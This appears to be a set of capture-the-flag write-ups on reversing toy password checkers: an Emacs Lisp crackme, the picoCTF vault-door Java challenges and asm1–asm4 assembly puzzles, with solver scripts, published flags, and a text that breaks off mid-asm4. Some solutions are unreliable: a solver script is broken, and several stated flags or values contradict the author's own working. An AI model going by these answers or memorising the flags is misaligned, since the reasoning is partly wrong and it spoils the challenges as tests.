(defalias 'check-key #[(key) "\303\304!rq\210\305\216	c\210eb\210\306 G\307U\205F
\310\311!\210\312\210\313u\210\310\314!\210\315 \210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\316\312!\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\316\312!\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\316\312!\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\316\312!\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\316\312!\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\316\312!\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\312u\210\316\312!\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\313u\210\316\312!\210\315 \210\317\320\321\306 \"\n\232)+\207" [#1=#:temp-buffer key toast generate-new-buffer " *temp*" #[nil "\301!\205

(define-derived-mode pro-mode prog-mode "Professional Mode"
  "Major mode for professional Emacs users."
  :group 'pro
  (let ((key (read-from-minibuffer "Enter license key: ")))
    (unless (check-key key)
      (message "Key verification failed. Falling back to fundamental-mode.")
      (fundamental-mode))))

(provide 'pro-mode)

I have never messed with Emacs before but thankfully the author gave a hint on how to load the file.

1. Open GNU Emacs:
   1. Press Alt+X
   2. Type “load-file” and hit enter
   3. Type in “pro-mode.el” and hit enter
2. To run pro-mode
   1. Press Alt-X
   2. Type in “pro-mode” and press enter
3. To disassemble an elisp function
   1. Press Alt-X
   2. Type in “disassemble” and press enter
   3. Type the name of the function and press enter

Elisp disassembly is strange in that almost every operation pushes something to the stack. One can read about the disassembly here

If we run the instructions and disassemble check-key we get a dump of the disassembly of the function. Which starts with defining a buffer.

byte code for check-key:
  args: (key)
0       constant  generate-new-buffer
1       constant  " *temp*"
2       call      1
3       varbind   temp-buffer
4       save-current-buffer
5       varref    temp-buffer
6       set-buffer
7       discard
8       constant  <compiled-function>
      args: nil
    0       constant  buffer-name
    1       varref    temp-buffer
    2       call      1
    3       goto-if-nil-else-pop 1
    6       constant  kill-buffer
    7       varref    temp-buffer
    8       call      1
    9:1     return

9       unwind-protect

Following this we set the key, the users input, to the current buffer

10      varref    key
11      insert
12      discard
13      point-min
14      goto-char
15      discard
16      constant  buffer-string
17      call      0

After we setup the buffer we compare the length of the key against 30. If it isnt 30 we quit.

18      length
19      constant  30
20      eqlsign
21      goto-if-nil-else-pop 1

Now we delete the first six characters of the key; removes UMASS{

24      constant  delete-char
25      constant  6
26      call      1
27      discard

After that the function deletes the last character of the key; removes }

28      constant  nil
29      end-of-line
30      discard
31      constant  -1
32      forward-char
33      discard
34      constant  delete-char
35      constant  1
36      call      1
37      discard

Now we begin the encryption. First we move back to the beginning of the line.

38      constant  beginning-of-line
39      call      0
40      discard

After that we move forward 10 characters and swap the character at the 10th location with the 11th location (counting as if the characters start at 1).

41      constant  nil
42      forward-char
43      discard
44      constant  nil
45      forward-char
46      discard
47      constant  nil
48      forward-char
49      discard
50      constant  nil
51      forward-char
52      discard
53      constant  nil
54      forward-char
55      discard
56      constant  nil
57      forward-char
58      discard
59      constant  nil
60      forward-char
61      discard
62      constant  nil
63      forward-char
64      discard
65      constant  nil
66      forward-char
67      discard
68      constant  nil
69      forward-char
70      discard
71      constant  transpose-chars
72      constant  nil
73      call      1
74      discard

Afterwards we walk back 10 characters, not the swap moves us forward a character so after this we will be at the second character.

75      constant  -1
76      forward-char
77      discard
78      constant  -1
79      forward-char
80      discard
81      constant  -1
82      forward-char
83      discard
84      constant  -1
85      forward-char
86      discard
87      constant  -1
88      forward-char
89      discard
90      constant  -1
91      forward-char
92      discard
93      constant  -1
94      forward-char
95      discard
96      constant  -1
97      forward-char
98      discard
99      constant  -1
100     forward-char
101     discard
102     constant  -1
103     forward-char
104     discard

We then swap character 2 and 3

105     constant  transpose-chars
106     constant  nil
107     call      1
108     discard

This loops four times so we can build a little Python script to solve this for us.

s = '1v_ms14__ks1rtpk_1dd13s'

for x in range(4):
    tmp = s[9+i]
    s[9+i] = s[10+i]
    s[10+i] = tmp

    tmp = s[0+i]
    s[0+i] = s[1+i]
    s[1+i] = tmp

    i += 1

Flag

UMASS{v1m_1s_4_skr1pt_k1dd13s}

vault-door-training

Problem

Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java

Hint: The password is revealed in the program’s source code.

Solution

This challenge is meant to get your feet wet with reverse engineering. If you know Java the challenge is quite trivial.

String userInput = scanner.next();
String input = userInput.substring("picoCTF{".length(),userInput.length()-1);

We see it grabs the user’s input and parses out picoCTF{ and the last character; which should be } if we are following the flag format.

if (vaultDoor.checkPassword(input)) {
 System.out.println("Access granted.");
} else {
 System.out.println("Access denied!");
}

After that, it passes our input to a checkPassword function.

public boolean checkPassword(String password) {
    return password.equals("w4rm1ng_Up_w1tH_jAv4_ca5ae7fcc95");
}

Looking into checkPassword we see it compares the parameter against w4rm1ng_Up_w1tH_jAv4_ca5ae7fcc95 Therefore, if we send picoCTF{w4rm1ng_Up_w1tH_jAv4_ca5ae7fcc95} to the program we will be awarded the good boy message Access granted.

flag: picoCTF{w4rm1ng_Up_w1tH_jAv4_ca5ae7fcc95}

vault-door-1

Problem

This vault uses some complicated arrays! I hope you can make sense of it, special agent. The source code for this vault is here: VaultDoor1.java

Hint: Look up the charAt() method online.

Solution

Looking at the source code for this challenge it is very similar to the training challenge. However checkPassword is different.

public boolean checkPassword(String password) {
 return password.length() == 32 &&
 password.charAt(0) == 'd' &&
 password.charAt(29) == '3' &&
 password.charAt(4) == 'r' &&
 password.charAt(2) == '5' &&
 password.charAt(23) == 'r' &&
 password.charAt(3) == 'c' &&
 password.charAt(17) == '4' &&
 password.charAt(1) == '3' &&
 password.charAt(7) == 'b' &&
 password.charAt(10) == '_' &&
 password.charAt(5) == '4' &&
 password.charAt(9) == '3' &&
 password.charAt(11) == 't' &&
 password.charAt(15) == 'c' &&
 password.charAt(8) == 'l' &&
 password.charAt(12) == 'H' &&
 password.charAt(20) == 'c' &&
 password.charAt(14) == '_' &&
 password.charAt(6) == 'm' &&
 password.charAt(24) == '5' &&
 password.charAt(18) == 'r' &&
 password.charAt(13) == '3' &&
 password.charAt(19) == '4' &&
 password.charAt(21) == 'T' &&
 password.charAt(16) == 'H' &&
 password.charAt(27) == 'd' &&
 password.charAt(30) == '8' &&
 password.charAt(25) == '_' &&
 password.charAt(22) == '3' &&
 password.charAt(28) == '0' &&
 password.charAt(26) == '9' &&
 password.charAt(31) == 'f';
}

checkPassword still compares our input against a hardcoded string, however, this time the original plaintext version of the string has been obfuscated. charAt(int index) takes an integer that represents an index in the original string.

For example if you had hello and called hello.charAt(1) you would get e in return.

There are multiple ways to solve this and my solution is most definitely not the prettiest. If we copy all the lines that contain password.charAt... into a text file called parsed_output we can run this bash script to get the flag.

$ sort -V parsed_output | cut -c 25 | tr -d "\n"
d35cr4mbl3_tH3_cH4r4cT3r5_9d038f%

In this bash script we first sort the file using the version format. This works since in our input text we have strings that start the same and have a differing index value that can be treated as a “version-number”. After that, we cut all the text out except the characters in the flag, and then we replace all the newline characters with a blank character.

flag: picoCTF{d35cr4mbl3_tH3_cH4r4cT3r5_9d038f}

vault-door-3

Problem

This vault uses for-loops and byte arrays. The source code for this vault is here: VaultDoor3.java

Hint: Make a table that contains each value of the loop variables and the corresponding buffer index that it writes to.

Solution

public boolean checkPassword(String password) {
 if (password.length() != 32) {
 return false;
 }
 char[] buffer = new char[32];
 int i;
 for (i=0; i<8; i++) {
 buffer[i] = password.charAt(i);
 }
 for (; i<16; i++) {
 buffer[i] = password.charAt(23-i);
 }
 for (; i<32; i+=2) {
 buffer[i] = password.charAt(46-i);
 }
 for (i=31; i>=17; i-=2) {
 buffer[i] = password.charAt(i);
 }
 String s = new String(buffer);
 return s.equals("jU5t_a_sna_3lpm11ga4e_u_4_m9rf48");
}

As we have seen before the main program is the same and the difference is in the checkPassword function. This time the function rearranges our input which needs to end up equalling jU5t_a_sna_3lpm11ga4e_u_4_m9rf48.

for (i=0; i<8; i++) {
 buffer[i] = password.charAt(i);
}

We see for the first 8 characters there is no character shuffling.

for (; i<16; i++) {
 buffer[i] = password.charAt(23-i);
}

However, characters 8 - 15 in the output array do NOT map to characters 8 - 15 in our original input array. We see that they do map to 23 - i; essentially writing the characters in reverse. With this, we can create a table for characters 8 - 15.

For the next chunk of characters we do this again but skip every other character.

for (; i<32; i+=2) {
 buffer[i] = password.charAt(46-i);
}

Now for the last transformation. For this we use the characters we skipped over in the last transformation.

for (i=31; i>=17; i-=2) {
 buffer[i] = password.charAt(i);
}

Therefore, putting all the mappings together we get out input strings should be picoCTF{jU5t_a_s1mpl3_ang4r4m_4_u_e9af18}.

flag: picoCTF{jU5t_a_s1mpl3_an4gr4m_4_u_e9af18}

vault-door-4

Problem

This vault uses ASCII encoding for the password. The source code for this vault is here: VaultDoor4.java

Hint: Use a search engine to find an “ASCII table”.

Hint: You will also need to know the difference between octal, decimal, and hexadecimal numbers.

Solution

First, let’s look at the checkPassword function.

public boolean checkPassword(String password) {
    byte[] passBytes = password.getBytes();
    byte[] myBytes = {
        106 , 85 , 53 , 116 , 95 , 52 , 95 , 98 ,
        0x55, 0x6e, 0x43, 0x68, 0x5f, 0x30, 0x66, 0x5f,
        0142, 0131, 0164, 063 , 0163, 0137, 070 , 060 ,
        'f' , '8' , 'e' , '1' , 'e' , '0' , '4' , '7' ,
    };
    for (int i=0; i<32; i++) {
        if (passBytes[i] != myBytes[i]) {
            return false;
        }
    }
    return true;
}

We can see that there’s no array shuffling this time, thankfully. This time it uses different ASCII representations to obscure the flag; with each line being a different representation. The first line uses decimal values, the second line hexadecimal, the third octal, and the last plain ASCII.

Using Python 2 we can quickly convert this array. Python 3’s octal format is not 0NUMBER like Java, but Python 2’s is. Python 3 uses 0oNUMBER like 0o142.

enc = [
 106 , 85 , 53 , 116 , 95 , 52 , 95 , 98 ,
 0x55, 0x6e, 0x43, 0x68, 0x5f, 0x30, 0x66, 0x5f,
 0142, 0131, 0164, 063 , 0163, 0137, 070 , 060]
plain = ['f' , '8' , 'e' , '1' , 'e' , '0' , '4' , '7']
print ''.join(map(chr, enc) + plain)

Running this in Python 2 we can get our flag.

flag: picoCTF{jU5t_4_bUnCh_0f_bYt3s_80f8e1e047}.

vault-door-5

Problem

In the last challenge, you mastered octal (base 8), decimal (base 10), and hexadecimal (base 16) numbers, but this vault door uses a different change of base as well as URL encoding! The source code for this vault is here: VaultDoor5.java

Hint: You may find an encoder/decoder tool helpful, such as https://encoding.tools/

Hint: Read the wikipedia articles on URL encoding and base 64 encoding to understand how they work and what the results look like.

Solution

Looking at the source code this challenge is quite trivial.

public boolean checkPassword(String password) {
 String urlEncoded = urlEncode(password.getBytes());
 String base64Encoded = base64Encode(urlEncoded.getBytes());
 String expected = "JTYzJTMwJTZlJTc2JTMzJTcyJTc0JTMxJTZlJTY3JTVm"\
 + "JTY2JTcyJTMwJTZkJTVmJTYyJTYxJTM1JTY1JTVmJTM2"\
 + "JTM0JTVmJTY0JTYxJTM4JTM4JTMyJTY0JTMwJTMx";
 return base64Encoded.equals(expected);
}

urlEncode parses a string and converts it to the URL Encoded equivalent. After that, it simply uses a base 64 encoding scheme on the URL encoded output.

Now that we know how this challenge obscures the input it is relatively easy to solve. We can use a Python script to solve this.

import base64
print(''.join(map(chr, [int(x, 16) for x in base64.b64decode(expected).decode().strip('%').split('%')])))

In this script, we first decode the base 64 encryption. Following that we strip out the leading and ending percent signs, if we do not it will mess up the latter steps. After this, we will treat the percent sign as a delimiter and split the string at each instance of one. At this point, we now have a list of hexadecimal characters that need to be converted to their ASCII equivalents. We first convert the string representation of the hexadecimal numbers to integers and pass them to chr using map.

Running the Python script we get this in return; c0nv3rt1ng_fr0m_ba5e_64_da882d01.

flag: picoCTF{c0nv3rt1ng_fr0m_ba5e_64_da882d01}

vault-door-6

Problem

This vault uses an XOR encryption scheme. The source code for this vault is here: VaultDoor6.java

Hint: If X ^ Y = Z, then Z ^ Y = X. Write a program that decrypts the flag based on this fact.

Solution

Looking at the checkPassword function we see this challenge obscures the flag with a simple XOR encryption.

public boolean checkPassword(String password) {
 if (password.length() != 32) {
 return false;
 }
 byte[] passBytes = password.getBytes();
 byte[] myBytes = {
 0x3b, 0x65, 0x21, 0xa , 0x38, 0x0 , 0x36, 0x1d,
 0xa , 0x3d, 0x61, 0x27, 0x11, 0x66, 0x27, 0xa ,
 0x21, 0x1d, 0x61, 0x3b, 0xa , 0x2d, 0x65, 0x27,
 0xa , 0x63, 0x65, 0x64, 0x67, 0x37, 0x6d, 0x62,
 };
 for (int i=0; i<32; i++) {
 if (((passBytes[i] ^ 0x55) - myBytes[i]) != 0) {
 return false;
 }
 }
 return true;
}

The key used in the XOR encryption is 0x55. For XOR encryptions the key that is used to encrypt is also used to decrypt messages, and the algorithm used to decrypt is the same used to encrypt.

To solve this all we need to do is run a quick Python script.

enc = [
 0x3b, 0x65, 0x21, 0xa , 0x38, 0x0 , 0x36, 0x1d,
 0xa , 0x3d, 0x61, 0x27, 0x11, 0x66, 0x27, 0xa ,
 0x21, 0x1d, 0x61, 0x3b, 0xa , 0x2d, 0x65, 0x27,
 0xa , 0x63, 0x65, 0x64, 0x67, 0x37, 0x6d, 0x62,]
print(''.join(map(chr, [ x ^ 0x55 for x in enc])))

We use a simple list comprehension to quickly XOR all the bytes, following that we print out the ASCII representation. We get the following output: n0t_mUcH_h4rD3r_tH4n_x0r_6012b87.

flag: picoCTF{n0t_mUcH_h4rD3r_tH4n_x0r_6012b87}

vault-door-7

Problem

This vault uses bit shifts to convert a password string into an array of integers. Hurry, agent, we are running out of time to stop Dr. Evil’s nefarious plans! The source code for this vault is here: VaultDoor7.java

Hint: Use a decimal/hexadecimal converter such as this one: https://www.mathsisfun.com/binary-decimal-hexadecimal-converter.html

Hint: You will also need to consult an ASCII table such as this one: https://www.asciitable.com/

Solution

Looking at the source for this challenge we see it is a little different than the other ones we have faced. This time we need to understand bit shifting.

public boolean checkPassword(String password) {
 if (password.length() != 32) {
 return false;
 }
 int[] x = passwordToIntArray(password);
 return x[0] == 1096770097
 && x[1] == 1952395366
 && x[2] == 1600270708
 && x[3] == 1601398833
 && x[4] == 1716808014
 && x[5] == 1734304870
 && x[6] == 895891557
 && x[7] == 1681142832;
}

We see within the normal checkPassword function we pass our input password to a passwordToIntArray function. The values returned by this function are checked against hardcoded values. The first thing we should do is looking into how the output array is generated by passwordToIntArray.

public int[] passwordToIntArray(String hex) {
 int[] x = new int[8];
 byte[] hexBytes = hex.getBytes();
 for (int i=0; i<8; i++) {
 x[i] = hexBytes[i*4] << 24
 | hexBytes[i*4+1] << 16
 | hexBytes[i*4+2] << 8
 | hexBytes[i*4+3];
 }
 return x;
}

Inside passwordToIntArray we see it takes a string which it refers to as hex. It generates an empty int array of size 8 and then uses string’s getBytes function on hex. This will encode the string as a sequence of bytes and return the output as an array. Following the conversion of our input array, we enter a for loop that runs 8 times, with four characters of our input string being transformed each run.

The << refers to a bit shift, a signed bit shift to the left, in Java. So if we had 0001 and performed « 2 we would have 0100 as an output.

Therefore, if we perform a 24-bit shift to the left on a hexadecimal representation of an ASCII character its original 8 bits will be shifted 24 places to the left. In Java, an integer, which is the type these bits are being transformed into, is 4 bytes or 32 bits. If our first character was an A it would be 0x41 in hexadecimal and 0b1000001 in binary. To convert this to an integer we will need to zero extend to the 31st place. Therefore our A would look like 0b00000000000000000000000001000001 and performing a left bit shift of 24 would convert our output to 0b10000010000000000000000000000000. So, in short, we push our bits that encode an A to the most significant bit. This is done three more times, except we do a bit shift of 16, then 8, and then of 0. All we are doing is smashing four hexadecimal characters together. If we originally had ABCD they would be encoded as [0x41, 0x42, 0x43, 0x44] in our hexBytes but then in the for loop, they are smashed together to equal 0x41424344 or 1094861636.

To get our flag all we need to do is decode the hardcoded values and translate them into their original 1 byte values and then convert them back to ASCII.

dec = [1096770097, 1952395366,
 1600270708, 1601398833,
 1716808014, 1734304870,
 895891557, 1681142832]
for d in dec:
 value = hex(d)[2:]
 for i in range(0, len(value), 2):
 print(chr(int(value[i: i+2],16)),end ='')

Running the Python script we will get A_b1t_0f_b1t_sh1fTiNg_df5f8ed440 which if we input into the program we get the success message.

flag: picoCTF{A_b1t_0f_b1t_sh1fTiNg_df5f8ed440}

vault-door-8

Problem

Apparently Dr. Evil’s minions knew that our agency was making copies of their source code, because they intentionally sabotaged this source code in order to make it harder for our agents to analyze and crack into! The result is a quite mess, but I trust that my best special agent will find a way to solve it. The source code for this vault is here: VaultDoor8.java

Hint: Clean up the source code so that you can read it and understand what is going on.

Hint: Draw a diagram to illustrate which bits are being switched in the scramble() method, then figure out a sequence of bit switches to undo it. You should be able to reuse the switchBits() method as is.

Solution

Out of all the vault door challenge this took me the most amount of time. First things first, we need to clean up this obfuscated source code. I used tutorialspoint online Java formatter, but anything will do the trick.

// These pesky special agents keep reverse engineering our source code and then
// breaking into our secret vaults. THIS will teach those sneaky sneaks a
// lesson.
//
// -Minion #0891
import java.util.*;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.security.*;
class VaultDoor8 {
 public static void main(String args[]) {
 Scanner b = new Scanner(System.in);
 System.out.print("Enter vault password: ");
 String c = b.next();
 String f = c.substring(8, c.length() - 1);
 VaultDoor8 a = new VaultDoor8();
 if (a.checkPassword(f)) {
 System.out.println("Access granted.");
 } else {
 System.out.println("Access denied!");
 }
 }
 public char[] scramble(String password) { /* Scramble a password by transposing pairs of bits. */
 char[] a = password.toCharArray();
 for (int b = 0; b < a.length; b++) {
 char c = a[b];
 c = switchBits(c, 1, 2);
 c = switchBits(c, 0, 3); /* c = switchBits(c,14,3); c = switchBits(c, 2, 0); */
 c = switchBits(c, 5, 6);
 c = switchBits(c, 4, 7);
 c = switchBits(c, 0, 1); /* d = switchBits(d, 4, 5); e = switchBits(e, 5, 6); */
 c = switchBits(c, 3, 4);
 c = switchBits(c, 2, 5);
 c = switchBits(c, 6, 7);
 a[b] = c;
 }
 return a;
 }
 public char switchBits(char c, int p1, int p2) {
 /* Move the bit in position p1 to position p2, and move the bit
 that was in position p2 to position p1. Precondition: p1 < p2 */
 char mask1 = (char)(1 << p1);
 char mask2 = (char)(1 << p2); /* char mask3 = (char)(1<<p1<<p2); mask1++; mask1--; */
 char bit1 = (char)(c & mask1);
 char bit2 = (char)(c & mask2);
 /*
 System.out.println("bit1 " + Integer.toBinaryString(bit1));
 System.out.println("bit2 " + Integer.toBinaryString(bit2));
 */
 char rest = (char)(c & ~(mask1 | mask2));
 char shift = (char)(p2 - p1);
 char result = (char)((bit1 << shift) | (bit2 >> shift) | rest);
 return result;
 }
 public boolean checkPassword(String password) {
 char[] scrambled = scramble(password);
 char[] expected = {
 0xF4,0xC0,0x97, 0xF0, 0x77, 0x97, 0xC0, 0xE4,
 0xF0, 0x77, 0xA4, 0xD0, 0xC5, 0x77, 0xF4, 0x86,
 0xD0, 0xA5, 0x45, 0x96, 0x27, 0xB5, 0x77, 0xC0,
 0xB4, 0xD1, 0xD2, 0x85, 0xA4, 0xA5, 0xC1,0x85};
 return Arrays.equals(scrambled, expected);
 }
}

Instead of trying to figure out how the bit swapping works I just changed the source code by reversing the calls in scramble. We will also need to change the input parameter to a character array since we will no longer be passing it as a string.

public char[] scramble(char [] a) {
 for (int b = 0; b < a.length; b++) {
 char c = a[b];
 c = switchBits(c, 6, 7);
 c = switchBits(c, 2, 5);
 c = switchBits(c, 3, 4);
 c = switchBits(c, 0, 1);
 c = switchBits(c, 4, 7);
 c = switchBits(c, 5, 6);
 c = switchBits(c, 0, 3);
 c = switchBits(c, 1, 2);
 a[b] = c;
 }
 return a;
}

If we then change checkPassword to pass expected to scramble we can de-scramble the obscured flag and print out the output we should receive the flag. An additional change to checkPassword is to remove the parameter that is passed to it. Also, we will need to change the main so it does not expect input from us anymore.

public void checkPassword() {

 char[] expected = {
 0xF4,0xC0,0x97, 0xF0, 0x77, 0x97, 0xC0, 0xE4,
 0xF0, 0x77, 0xA4, 0xD0, 0xC5, 0x77, 0xF4, 0x86,
 0xD0, 0xA5, 0x45, 0x96, 0x27, 0xB5, 0x77, 0xC0,
 0xB4, 0xD1, 0xD2, 0x85, 0xA4, 0xA5, 0xC1,0x85};
 char[] descrambled = scramble(expected);
 System.out.println(descrambled);
}

public static void main(String args[]) {
 VaultDoor8 a = new VaultDoor8();
 a.checkPassword();
}

Now running the program we will get s0m3_m0r3_b1t_sh1fTiNg_0c59dbf4d as the output. Running the original program and supplying that as the input will give us the good boy message. Therefore, our flag is picoCTF{s0m3_m0r3_b1t_sh1fTiNg_0c59dbf4d}.

asm1

Problem

What does asm1(0x1b4) return? Submit the flag as a hexadecimal value (starting with ‘0x’). NOTE: Your submission for this question will NOT be in the normal flag format. Source located in the directory at /problems/asm1_3_afba952b3219ced79409c353bf73fbd8.

Hint: assembly conditions

Solution

Looking at the assembly source code we see that there are multiple jump conditions we much pass.

Our first condition is below. We check the value pointed to by EBP+0x8 against 0x421. Since this program took one parameter, 0x1b4, we know that EBP+0x8 is the address pointing to the first passed parameter. With EBP+0x4 being the program’s runtime path. Since 0x1B4 < 0x421 we will not take the jump condition as it is JG or jump greater, therefore, we will move onto line 12.

<+3>: cmp DWORD PTR [ebp+0x8],0x421
<+10>: jg 0x512 <asm1+37>

In this check, we compare the passed parameter against 0x1B4. Since 0x1B4 == 0x1B4 we will not take this jump as it is jne or [jump not equal(https://www.aldeid.com/wiki/X86-assembly/Instructions/jg); on to the next line.

<+12>: cmp DWORD PTR [ebp+0x8],0x1b4
<+19>: jne 0x50a <asm1+29>

Here we move 0x421 into EAX. Following this, we perform 0x1B4 + 0x13; after this operation, EAX will contain 0x1C7 and jump to line 60.

<+21>: mov eax,DWORD PTR [ebp+0x8]
<+24>: add eax,0x13
<+27>: jmp 0x529 <asm1+60>

We now clean up our stack and exit this function. Since EAX is treated as the return value we return 0x1C7. Therefore, our flag is 0x1C7.

<+60>: pop ebp
<+61>: ret

asm2

Problem

What does asm2(0x6,0x24) return? Submit the flag as a hexadecimal value (starting with ‘0x’). NOTE: Your submission for this question will NOT be in the normal flag format. Source located in the directory at /problems/asm2_6_88bbaaae0b7723b33c39fce07d342e36.

Solution

The program starts with the stack looking like so:

+---------+
| 0x24 | <-- ebp + 0xc
+---------+
| 0x6 | <-- ebp + 0x8
+---------+
| ret | <-- ebp + 0x4
+---------+
| old ebp | <-- ebp
+---------+

<+0>: push ebp
<+1>: mov ebp,esp
<+3>: sub esp,0x10

After we set up the stack with the stack prologue it now looks like this:

+---------+
| 0x24 | <-- ebp + 0xc
+---------+
| 0x6 | <-- ebp + 0x8
+---------+
| ret | <-- ebp + 0x4
+---------+
| old ebp | <-- ebp
+---------+
| | <-- ebp - 0x4
+---------+
| | <-- ebp - 0x8
+---------+
| | <-- ebp - 0xc
+---------+
| | <-- ebp - 0x10
+---------+

This program starts by loading the second passed parameter, 0x24, into EAX. Following this, we load the contents of EAX into temporary storage at EBP-0x4, essentially EBP-0x4 points to the second parameter. We do the same for the first parameter, 0x6, but have it stored at EBP-0x8 and then jump to line 31.

<+6>: mov eax,DWORD PTR [ebp+0xc] ; eax = 0x24
<+9>: mov DWORD PTR [ebp-0x4],eax ; var1 = 0x24
<+12>: mov eax,DWORD PTR [ebp+0x8] ; eax = 0x6
<+15>: mov DWORD PTR [ebp-0x8],eax ; var2 = 0x6
<+18>: jmp 0x50c <asm2+31>

After this code block our stack will look like this:

+---------+
| 0x24 | <-- ebp + 0xc
+---------+
| 0x6 | <-- ebp + 0x8
+---------+
| ret | <-- ebp + 0x4
+---------+
| old ebp | <-- ebp
+---------+
| 0x24 | <-- ebp - 0x4
+---------+
| 0x6 | <-- ebp - 0x8
+---------+
| | <-- ebp - 0xc
+---------+
| | <-- ebp - 0x10
+---------+

Here we check and see if the value at EBP-0x8 less than or equal to 0x3C75. Currently EBP-0x8 contains 0x6 therefore we will make the jump to line 20.

<+31>: cmp DWORD PTR [ebp-0x8],0x3c75
<+38>: jle 0x501 <asm2+20>

At line 20 we add 0x1 to EBP-0x4 and add 0xF9 to EBP-0x8. Then we do the same compare and conditional jump. For the jump to fail EBP-0x8 needs to be greater than 0x501. Since we add 0xF9 each time to EBP-0x8 it will take 63 iterations to complete.

<+20>: add DWORD PTR [ebp-0x4],0x1
<+24>: add DWORD PTR [ebp-0x8],0xf9
<+31>: cmp DWORD PTR [ebp-0x8],0x3c75
<+38>: jle 0x501 <asm2+20>

After the first iteration of our loop our stack will look like:

+---------+
| 0x24 | <-- ebp + 0xc
+---------+
| 0x6 | <-- ebp + 0x8
+---------+
| ret | <-- ebp + 0x4
+---------+
| old ebp | <-- ebp
+---------+
| 0x25 | <-- ebp - 0x4
+---------+
| 0xff | <-- ebp - 0x8
+---------+
| | <-- ebp - 0xc
+---------+
| | <-- ebp - 0x10
+---------+

After not jumping we load EAX with EBP-0x4. Since we ran the loop 63 times EBP-0x4 will equal 0x63 (0x24 + 63). We then clean up the stack and leave the function.

<+40>: mov eax,DWORD PTR [ebp-0x4]
<+43>: leave
<+44>: ret

asm3

Problem

What does asm3(0xfe8cf7a4,0xf55018af,0xb8c70926) return? Submit the flag as a hexadecimal value (starting with ‘0x’). NOTE: Your submission for this question will NOT be in the normal flag format. Source located in the directory at /problems/asm3_6_22c78ed107ca0b7dd11f868d7203cf8c.

Solution

<+0>: push ebp
<+1>: mov ebp,esp
<+3>: xor eax,eax

After we setup the stack with the first two lines and clear EAX our stack will look like this:

+----------------+
| 0xb8c70926 | <-- ebp + 0x10
+----------------+
| 0xf55018af | <-- ebp + 0xc
+----------------+
| 0xfe8cf7a4 | <-- ebp + 0x8
+----------------+
| ret | <-- ebp + 0x4
+----------------+
| old ebp | <-- ebp
+----------------+

<+5>: mov ah,BYTE PTR [ebp+0x9]
<+8>: shl ax,0x10

We then load EBP+0x9 into AH which will be 0xF7. Following this, we perform a shift on AX which contains 0xF700. Performing a left shift of 16 will completely shift everything off of AX, therefore, AX after this operation will contain 0.

<+12>: sub al,BYTE PTR [ebp+0xd] ; AL = 0x0 - 0x18 = 0xE8

After the prior shift left we will subtract AL by the contents of EBP+0xD; which is 0x18. Performing this operation will set AL with 0xE8, which is a negative 0x18 in two’s complement.

<+15>: add ah,BYTE PTR [ebp+0xe] AH = 0x0 + 0x50 = 0x50

Now we add EBP+0xE to AH; which is 0x50. Since AH is still 0x0 from last time the resulting operation will have AH be 0x50.

<+18>: xor ax,WORD PTR [ebp+0x12]

Then we perform an XOR operation on AX with EBP+0x12; which is 0xE82F. So the value in AX after this operation will be 0x502F NOTE: This time the value we pull is larger. This is because we use the WORD keyword instead of BYTE as we have done in the past. This little difference tripped me up the first time attempting this challenge. Therefore, our flag is 0xE82F.

asm4

Problem

What will asm4(“picoCTF_c1373”) return? Submit the flag as a hexadecimal value (starting with ‘0x’). NOTE: Your submission for this question will NOT be in the normal flag format. Source located in the directory at /problems/asm4_5_ca12dca0134f6b54a52c905ffc1e5b35.

Solution

<+0>: push ebp
<+1>: mov ebp,esp
<+3>: push ebx
<+4>: sub esp,0x10

After the stack prologue our stack will look like this:

+----------------+
| picoCTF_c1373 | <-- ebp + 0x8
+----------------+
| ret | <-- ebp + 0x4
+----------------+
| old ebp | <-- ebp
+----------------+
| | <-- ebp - 0x4
+----------------+
| | <-- ebp - 0x8
+----------------+
| | <-- ebp - 0xc
+----------------+
| | <-- ebp - 0x10
+----------------+

<+7>: mov DWORD PTR [ebp-0x10],0x247 ; var2 = 0x247
<+14>: mov DWORD PTR [ebp-0xc],0x0 ; var1 = 0
<+21>: jmp 0x518 <asm4+27>

The first few lines will load some hardcoded values into local variables. After these lines the stack will look like this:

+----------------+
| picoCTF_c1373 | <-- ebp + 0x8
+----------------+
| ret | <-- ebp + 0x4
+----------------+
| old ebp | <-- ebp
+----------------+
| | <-- ebp - 0x4
+----------------+
| | <-- ebp - 0x8
+----------------+
| 0x0 | <-- ebp - 0xc
+----------------+
| 0x247 | <-- ebp - 0x10
+----------------+

1 and 1 = 1, ZF = 0

<+23>: add DWORD PTR [ebp-0xc],0x1 ; var1 += 1
<+27>: mov edx,DWORD PTR [ebp-0xc] ; edx = var1
<+30>: mov eax,DWORD PTR [ebp+0x8] ; eax = input
<+33>: add eax,edx ; eax = input[var1]
<+35>: movzx eax,BYTE PTR [eax] ;
<+38>: test al,al ; if al != 0
<+40>: jne 0x514 <asm4+23> ; jump 23

We now enter a loop block, line 23 is the loop counter incrementer but as this is the first iteration of the loop we skip over it. In the loop, we add the counter to the input character array, which starts as picoCTF_c1373. Then we do a test on the lower 8 bits of EAX. If the lower 8 bits are 0 then we will leave the loop otherwise we increment the loop counter at var1 and start again.

The only way for those bits to be zero is if we reach the null character in the character array; which denotes the end of the array. What this code block is doing is just getting the length of the input array; which is 13 characters long.

<+42>: mov DWORD PTR [ebp-0x8],0x1 ; var3 = 0
<+49>: jmp 0x587 <asm4+138>

Now we create a new local variable on the stack. So after this, our stack will look like this.

+----------------+
| picoCTF_c1373 | <-- ebp + 0x8
+----------------+
| ret | <-- ebp + 0x4
+----------------+
